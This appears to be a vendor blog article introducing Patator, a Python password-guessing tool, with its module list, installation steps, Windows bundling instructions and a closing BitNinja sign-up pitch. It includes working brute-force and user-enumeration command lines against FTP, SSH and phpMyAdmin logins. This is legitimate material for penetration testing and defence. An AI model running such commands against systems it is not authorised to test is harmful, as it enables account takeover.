Patator was developed out of frustration with existing tools like Hydra, Medusa, and Ncrack, which often fall short in reliability and flexibility. Aiming to provide a fresh approach, Patator is a multi-threaded tool written in Python designed for conducting password guessing attacks effectively.

Supported Modules

Patator supports a wide range of modules for different protocols, including:

• ftp_login: Brute-force FTP
• ssh_login: Brute-force SSH
• telnet_login: Brute-force Telnet
• smtp_login: Brute-force SMTP
• smtp_vrfy: Enumerate valid users using SMTP VRFY
• smtp_rcpt: Enumerate valid users using SMTP RCPT TO
• finger_lookup: Enumerate valid users using Finger
• http_fuzz: Brute-force HTTP/HTTPS
• rdp_gateway: Brute-force RDP Gateway
• ajp_fuzz: Brute-force AJP
• pop_login: Brute-force POP
• imap_login: Brute-force IMAP
• ldap_login: Brute-force LDAP
• ...and many more.

The name "Patator" is inspired by a humorous video reference, making it a memorable choice for this tool.

Installation

To install Patator, follow these steps:

git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt

Usage Examples

Patator can be used across various platforms with numerous scenarios. Here are some examples:

• FTP: Identifying users denied login in vsftpd/userlist.

$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500

Tested against vsftpd-3.0.2-9 on CentOS 7.0-1406.

• SSH: Time-based user enumeration.

$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3

Tested against openssh-server 1:6.0p1-4+deb7u2 on Debian 7.8.

• HTTP: Brute-force phpMyAdmin logon.

$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server'.

Tested against phpMyAdmin 4.2.7.1.

PyInstaller Bundling

Bundling Patator on Windows using PyInstaller involves several straightforward steps, beginning with installing Python and dependencies:

pip install pycrypto pyopenssl
pip install paramiko
pip install pysnmp

After preparing the environment, clone Patator and run PyInstaller:

cd c:\
git clone https://github.com/lanjelot/patator
git clone https://github.com/pyinstaller/pyinstaller
cd pyinstaller
python pyinstaller.py --clean --onefile c:\patator\patator.py

Conclusion

Patator is a versatile and efficient tool for password guessing attacks, boasting a variety of supported modules and ease of use. It is essential that users familiarize themselves with its capabilities and best practices to maximize its potential. By understanding how to use Patator effectively, users can conduct necessary security assessments and improve the security posture of their systems.

To enhance your security measures, consider registering for BitNinja.

Sign Up Today and Start Your Free Trial.